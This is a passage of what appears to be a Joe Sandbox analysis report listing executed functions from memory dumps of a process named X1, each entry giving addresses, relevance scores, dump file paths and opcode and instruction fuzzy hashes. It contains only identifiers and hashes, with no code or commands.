                                                                                • Opcode Fuzzy Hash: 06e6ad7e2d758a7b9c7ba71086ec7e21f2a161f6823efe48cad76ac58154d535
                                                                                • Instruction Fuzzy Hash: 1541B232D0EA9A5FE741BB6C98660EE7FB0EF95251F0401B7C449D71E3DE2C284A8354
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FF848F40E50 Relevance: .5, Instructions: 538COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2611643177.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_7ff848f40000_X1.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 24a28eac8c962568f7cead828ca06ceb69cd4422502b7614a8e0f8c6d3026ce9
                                                                                • Instruction ID: 1c92d0465d29f44f9f98dd7769d8a630f877346d74585c5b1b2ea08186a0cd01
                                                                                • Opcode Fuzzy Hash: 24a28eac8c962568f7cead828ca06ceb69cd4422502b7614a8e0f8c6d3026ce9
                                                                                • Instruction Fuzzy Hash: 4031BE32D0C99A9FE745BB6888661FE7FB1FF95650F4401B7C40AE72E3DE2829468350
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FF848F40780 Relevance: .2, Instructions: 199COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2611643177.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_7ff848f40000_X1.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: ac940ee4a09a16485279c76c05badc1493c0d622cdcb48884a0ff6f803b2f48b
                                                                                • Instruction ID: 587e27ca201f543977b9723e5305bc2a92ab1f6c85b263e809bfe6b0854ca1c5
                                                                                • Opcode Fuzzy Hash: ac940ee4a09a16485279c76c05badc1493c0d622cdcb48884a0ff6f803b2f48b
                                                                                • Instruction Fuzzy Hash: 2861353191F15A9FE380B76CA4A52EA3FB0EF81358F5481BAE14D8B2C7CE1C25458799
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FF848F40820 Relevance: .2, Instructions: 177COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2611643177.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_7ff848f40000_X1.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 7502a6021af55aacb1c5569c56d0f58484ae15f7a441a53d8e6a9a85559d353e
                                                                                • Instruction ID: 64482f305633e75f5b8f6bae7ca7b2e8a52841a5e22b5d6791bf9c1cf8276283
                                                                                • Opcode Fuzzy Hash: 7502a6021af55aacb1c5569c56d0f58484ae15f7a441a53d8e6a9a85559d353e
                                                                                • Instruction Fuzzy Hash: 75512631A1F15A9FD381F72C94A56EA3FB0FF81258F5481BAE149C72C7CE1C2A448799
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FF848F409BD Relevance: .1, Instructions: 113COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2611643177.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_7ff848f40000_X1.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: ce0744cb199302980cb1855e14a5fed150aaea2452faae4e775803af512617a0
                                                                                • Instruction ID: 053c4de02d79cb5c8a59f43d54908be1ff2515655f74c5f7955c95bc1c098980
                                                                                • Opcode Fuzzy Hash: ce0744cb199302980cb1855e14a5fed150aaea2452faae4e775803af512617a0
                                                                                • Instruction Fuzzy Hash: EA317E30E1AA0A9FDB84FB6884596FE7BB1FF98341F504579D00AD3286DE3CA9418B50
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FF848F4200C Relevance: .1, Instructions: 102COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2611643177.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_7ff848f40000_X1.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 6b872409ca5d1db2dddb17e572d16e9ae0111d934eae92cfe7e78d861fbdfc2e
                                                                                • Instruction ID: 3abb5bd9bea77d05b20f7368f0e0fa5c5006f3b97bdebcd5779e2ed6a5c56715
                                                                                • Opcode Fuzzy Hash: 6b872409ca5d1db2dddb17e572d16e9ae0111d934eae92cfe7e78d861fbdfc2e
                                                                                • Instruction Fuzzy Hash: 76218C30B2DA494FE788EF2C945A378B2D2EF98356F4505BEE00EC3293CE689C418745
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FF848F40B48 Relevance: .1, Instructions: 82COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2611643177.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_7ff848f40000_X1.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 93a08465391122d224fa2e1b871f3869dfbc07be7230a46afb8646b8b33dd262
                                                                                • Instruction ID: 0616fefc12858eddb823f0068592174d54d7f69c8c719350397187ee462cb507
                                                                                • Opcode Fuzzy Hash: 93a08465391122d224fa2e1b871f3869dfbc07be7230a46afb8646b8b33dd262
                                                                                • Instruction Fuzzy Hash: BA216220B2A90A9BFB84BBBC545A3BD62D2FF98745F50013AE40DD32D2DE2C68424795
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FF848F42101 Relevance: .1, Instructions: 51COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2611643177.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_7ff848f40000_X1.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 915d344cec61412460d0fe7a7aee7a6696f9b77903c5cb11906a7ffe4eccd437
                                                                                • Instruction ID: 2fe9fe383005a14d71b6eb5a9c36ad3644fc3253026de91cbc69000970e8042b
                                                                                • Opcode Fuzzy Hash: 915d344cec61412460d0fe7a7aee7a6696f9b77903c5cb11906a7ffe4eccd437
                                                                                • Instruction Fuzzy Hash: 2C01C630D1C6880FF381B33808550723FE0DFE8A90F0800BBE88AD30E7CE28AA458346
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Executed Functions

                                                                                Function 00007FF848F012E9 Relevance: 1.5, Strings: 1, Instructions: 239COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.2697187461.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_7ff848f00000_X1.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: SAP_^
                                                                                • API String ID: 0-3471593181
                                                                                • Opcode ID: e36d2c38e229fb375d8f5c944e5246ee30aceb6c6e556b56970e24b783ef7952
                                                                                • Instruction ID: 43a307960c893491c112d05af127ac5f57678ce970f1c188fd38d03fdeea0490
                                                                                • Opcode Fuzzy Hash: e36d2c38e229fb375d8f5c944e5246ee30aceb6c6e556b56970e24b783ef7952
                                                                                • Instruction Fuzzy Hash: 26715E71A199195FEB95BB78946D7BD7BB2FF99340F800478E40EC33C2EE2869018754
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FF848F00C5E Relevance: .7, Instructions: 749COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.2697187461.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_7ff848f00000_X1.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 25bf551476a29e9951acaba138e5054e39c6a7ebd98be1c9d86c1f194451e249
                                                                                • Instruction ID: 97e29b7eeaa0c155bca6b6c0afad35abe3bcf9e00b85ebaf54ec3e2c5f59ea7d
                                                                                • Opcode Fuzzy Hash: 25bf551476a29e9951acaba138e5054e39c6a7ebd98be1c9d86c1f194451e249
                                                                                • Instruction Fuzzy Hash: ED913831E0EA8A1FE756BB3C98551B97FE1EF86254F0900BBD448C72D3EE186C468365
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FF848F00DF5 Relevance: .6, Instructions: 577COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.2697187461.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_7ff848f00000_X1.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: a8bc59e5549ae14e4f06e3d2e0f4794bde294619fc14ef1737c376eb74033fc6
                                                                                • Instruction ID: 9e43c83ccbfee9e3197705fbd5fd788b3edd587b597ff6bd07ff769573c95218
                                                                                • Opcode Fuzzy Hash: a8bc59e5549ae14e4f06e3d2e0f4794bde294619fc14ef1737c376eb74033fc6
                                                                                • Instruction Fuzzy Hash: 1E41C532E0E68A5FE741BB6898611EE7FB0EF85254F0401B7D048D72D3EE28184A8365
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FF848F00E50 Relevance: .5, Instructions: 539COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.2697187461.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_7ff848f00000_X1.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 53e5c2237ce88b9fbdc395a746e13e63f5364467651e282cbf4ff7a537446abc
                                                                                • Instruction ID: d0c872b7fea87cc7495499b4a06da6505d1b8b84d69a80027f6a237e6383b3cf
                                                                                • Opcode Fuzzy Hash: 53e5c2237ce88b9fbdc395a746e13e63f5364467651e282cbf4ff7a537446abc
                                                                                • Instruction Fuzzy Hash: 1431E132E0D98E5FEB45EB6898651FE7FB0FF86240F4401B6D409D72D3EE2828458361
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FF848F00780 Relevance: .2, Instructions: 196COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.2697187461.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_7ff848f00000_X1.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 6cc506b66a9ca39329c0b77fb04a8bcb723a7ab6879b4eecdbab69e75e97fae6
                                                                                • Instruction ID: 7d6ee66c10599c835a20ca412a36b8e830f8f5c446d7d476601914715f3ec75c
                                                                                • Opcode Fuzzy Hash: 6cc506b66a9ca39329c0b77fb04a8bcb723a7ab6879b4eecdbab69e75e97fae6
                                                                                • Instruction Fuzzy Hash: 4261E53290F5969FD381B76CE4A52EA3FB0FF81258F5441BAD048CB393DE1C254587A9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FF848F00820 Relevance: .2, Instructions: 169COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.2697187461.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_7ff848f00000_X1.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: af1040140c9cf99c29ff398442e5fe34a1f9e26490355c28285c00a38a6e2fcc
                                                                                • Instruction ID: f6cdc0362c8c322e82d5f6dfcba5a02f7161ac2b85d2ad924e33fe0fa822b73e
                                                                                • Opcode Fuzzy Hash: af1040140c9cf99c29ff398442e5fe34a1f9e26490355c28285c00a38a6e2fcc
                                                                                • Instruction Fuzzy Hash: 0451E33290E5969FD781F768E4A56EA3FF0FF81254F9441BAD048CB393DE2C29048765
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FF848F009BD Relevance: .1, Instructions: 113COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.2697187461.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_7ff848f00000_X1.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 19de3152748bb5d06ff3273983d5793b8e0e46ff08c8397967f9aa51f58e1afd
                                                                                • Instruction ID: ebb3d790812c342c74532bf5919ef4ac7d32b7d58d88ee5e5f3f20b147ec5e40
                                                                                • Opcode Fuzzy Hash: 19de3152748bb5d06ff3273983d5793b8e0e46ff08c8397967f9aa51f58e1afd
                                                                                • Instruction Fuzzy Hash: 82317030E1991A9FEB45FB68D4556BE7BB2FF88344F900579D009D3386DE38A941CB50
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FF848F0200C Relevance: .1, Instructions: 102COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.2697187461.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_7ff848f00000_X1.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: b7fefc3256585bc70116ec30b170703a5728c885ce6f888a394ac768ca061d2f
                                                                                • Instruction ID: e8343bc2c8ea3649d740fad832de42c712d4f51d893744204458934ae225a2d7
                                                                                • Opcode Fuzzy Hash: b7fefc3256585bc70116ec30b170703a5728c885ce6f888a394ac768ca061d2f
                                                                                • Instruction Fuzzy Hash: 79218C30B1DA490FE788EF2C945A378B2D2EF99356F4505BEE00EC3293DE689C418745
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FF848F00B48 Relevance: .1, Instructions: 83COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.2697187461.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_7ff848f00000_X1.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 10812d024b0b2b79bb3608237e23d009818edd88ed180aaa8088673e02fbadd6
                                                                                • Instruction ID: dac8bb5912c932760a3cf80c50624c7f3e89de7f68cd204273e744a712538748
                                                                                • Opcode Fuzzy Hash: 10812d024b0b2b79bb3608237e23d009818edd88ed180aaa8088673e02fbadd6
                                                                                • Instruction Fuzzy Hash: 2D215020B2A90A9FFB44BB7C545A3BD72D2FF98645F500176E40DD32C2EE2C58424355
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FF848F02101 Relevance: .1, Instructions: 51COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.2697187461.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_7ff848f00000_X1.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: a29cb1e6c5fb7d29800ce5cc863a63b0211449a12ed495cd49f57f9dcf098a7d
                                                                                • Instruction ID: 69cc4f58f1f9367d56f72f4c10ce550081ee3e14f6cf2a1d2eb6d466120181b6
                                                                                • Opcode Fuzzy Hash: a29cb1e6c5fb7d29800ce5cc863a63b0211449a12ed495cd49f57f9dcf098a7d
                                                                                • Instruction Fuzzy Hash: 2E01CB20D0C6840FE743B33858550313FF0DF862C2F4804A6D888C31D3EE2869028366
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Executed Functions

                                                                                Function 00007FF848F312E9 Relevance: 3.3, Strings: 2, Instructions: 768COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.2924844678.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_7ff848f30000_X1.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: CAM_^$SAM_^
                                                                                • API String ID: 0-1151103998
                                                                                • Opcode ID: 758bcdcdb6649fe89466caf84cd8092de104123356179c4a2fdd74d2bc3a8323
                                                                                • Instruction ID: de6cf2fb4ca37796e195f0adda7a55684b709f70299e5695e86638d12e22fb05
                                                                                • Opcode Fuzzy Hash: 758bcdcdb6649fe89466caf84cd8092de104123356179c4a2fdd74d2bc3a8323
                                                                                • Instruction Fuzzy Hash: 85329230B2DA099FE794FB3884597BA76E2FF98344F54457AE40EC32C6DE2CA8418745
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FF848F30C5E Relevance: .7, Instructions: 749COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.2924844678.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_7ff848f30000_X1.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 48db55b3fb1a41002323bf5d88a99cc2d7959c795d8bdd8dca4e45df2378d25b
                                                                                • Instruction ID: 2c13a9e226b69d827dda5ec1bd51dcbb4f6de4b5086bd063b38e11d05c114577
                                                                                • Opcode Fuzzy Hash: 48db55b3fb1a41002323bf5d88a99cc2d7959c795d8bdd8dca4e45df2378d25b
                                                                                • Instruction Fuzzy Hash: E7912632E0EA8A4FE756BB3C98561F97BE1EF86250F0801BBD489C71D3DE1C58468355
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FF848F30DF5 Relevance: .6, Instructions: 577COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.2924844678.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_7ff848f30000_X1.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: b72a92ac19dc7cb6caad87bd23763e2c66fe8dbde041925fdf02b336cc89c58e
                                                                                • Instruction ID: 480aff3639c3fc4f027e5f29a932a6a79fcd0c1b97b92b3faf373ef8279e87b8
                                                                                • Opcode Fuzzy Hash: b72a92ac19dc7cb6caad87bd23763e2c66fe8dbde041925fdf02b336cc89c58e
                                                                                • Instruction Fuzzy Hash: DC41AE32D0E68A9FE741BB6C98651EE7FB0EF85250F0802B7C449DB1D3DE2C584A8354
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FF848F30E50 Relevance: .5, Instructions: 539COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.2924844678.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_7ff848f30000_X1.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: dafab5e1885dd2adf30fcf139ce90c720fbdaed286ec2fae2cf6a8236939bdbb
                                                                                • Instruction ID: 0abf7897572b80dfa9d307b4c294dd750202ce97110de0c229eaf54782900ed3
                                                                                • Opcode Fuzzy Hash: dafab5e1885dd2adf30fcf139ce90c720fbdaed286ec2fae2cf6a8236939bdbb
                                                                                • Instruction Fuzzy Hash: 0F319A32D0D98E8FE745BB6898651EEBFB0FF85250F4402B7D40AD72D3DE2868468350
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FF848F30780 Relevance: .2, Instructions: 193COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.2924844678.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_7ff848f30000_X1.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: ba70698ebffd9a3ea568be3819fdd4df0ae7e8fe2be2b75fab3e0dfe0d5d44bf
                                                                                • Instruction ID: a086fa029dee5f1921836f9e0bd9efec892e9a5cf44f9ecc3f6ff9374fbcacbf
                                                                                • Opcode Fuzzy Hash: ba70698ebffd9a3ea568be3819fdd4df0ae7e8fe2be2b75fab3e0dfe0d5d44bf
                                                                                • Instruction Fuzzy Hash: 0F51F43192F19A9FE380B768A4951EB3FB1EF81358F5882B7D14C8B2C7CE1C25458799
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FF848F30820 Relevance: .2, Instructions: 171COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.2924844678.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_7ff848f30000_X1.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 9e2a098a3137fc2472a62d19ff15cfb054572337f727edc0db948ccdbe750771
                                                                                • Instruction ID: c55b68c629987948bbf383b09538dbd6eac4bc6ce3739a4652346575323aecc0
                                                                                • Opcode Fuzzy Hash: 9e2a098a3137fc2472a62d19ff15cfb054572337f727edc0db948ccdbe750771
                                                                                • Instruction Fuzzy Hash: 5451E73192E18A9FD380F72894955EA3FB1FF81348F5881B7D1498B2D7CE1C29458799
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FF848F309BD Relevance: .1, Instructions: 113COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.2924844678.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_7ff848f30000_X1.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 53b673bc4608f6eae5a94fc97b1d92facb01d2f73822fc08ca416ecc9aa83586
                                                                                • Instruction ID: 3485255bc401cbf8325e66eb2f43b662d1ba0eb675b4d96d6684954d3f075dde
                                                                                • Opcode Fuzzy Hash: 53b673bc4608f6eae5a94fc97b1d92facb01d2f73822fc08ca416ecc9aa83586
                                                                                • Instruction Fuzzy Hash: C3317030E1A91E9FDB44FB6884696AE7BF2FF98340F50417AD009D7286DE3CA941CB54
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FF848F3200C Relevance: .1, Instructions: 102COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.2924844678.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_7ff848f30000_X1.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: e12740ecb1455b761c191c91aa664d01a5c08035ae4763dc8261cce95a32f759
                                                                                • Instruction ID: d4399e91606ec8ab409028f6dd981206ba2c1ccc52fabf348d28087f7c42e066
                                                                                • Opcode Fuzzy Hash: e12740ecb1455b761c191c91aa664d01a5c08035ae4763dc8261cce95a32f759
                                                                                • Instruction Fuzzy Hash: 74218C30B1DA494FE788EF2C945A379B2D2EF98356F4505BEE00EC3293CE689C418745
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FF848F30B48 Relevance: .1, Instructions: 83COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.2924844678.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_7ff848f30000_X1.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: ef9ab9afcf08fbac63cc14795025df611bd022d374210dabfa2f94cff7d6954d
                                                                                • Instruction ID: 4954042ab07a63449a91248b6ff84283a8befe9eb016000530550d631090b83e
                                                                                • Opcode Fuzzy Hash: ef9ab9afcf08fbac63cc14795025df611bd022d374210dabfa2f94cff7d6954d
                                                                                • Instruction Fuzzy Hash: 97214221B2A90A9BFB44BBBC545A3BD72D2EF98745F50417AE40DD32C2DE2C98424395
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FF848F32101 Relevance: .1, Instructions: 51COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.2924844678.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_7ff848f30000_X1.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 5cb5e229c41e70ccea04deaa1e3fea5e5395e7c9a7f0a4f5a67ffdab61c04d5d
                                                                                • Instruction ID: ff9706b52e7aafa63a128091a45a4666d613ef72139e4b91066bc940d4065ce2
                                                                                • Opcode Fuzzy Hash: 5cb5e229c41e70ccea04deaa1e3fea5e5395e7c9a7f0a4f5a67ffdab61c04d5d
                                                                                • Instruction Fuzzy Hash: 1E017634D1C7890FE387B73858650327FE0DF95692F0804EBD988C71EBDE28AA45835A
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%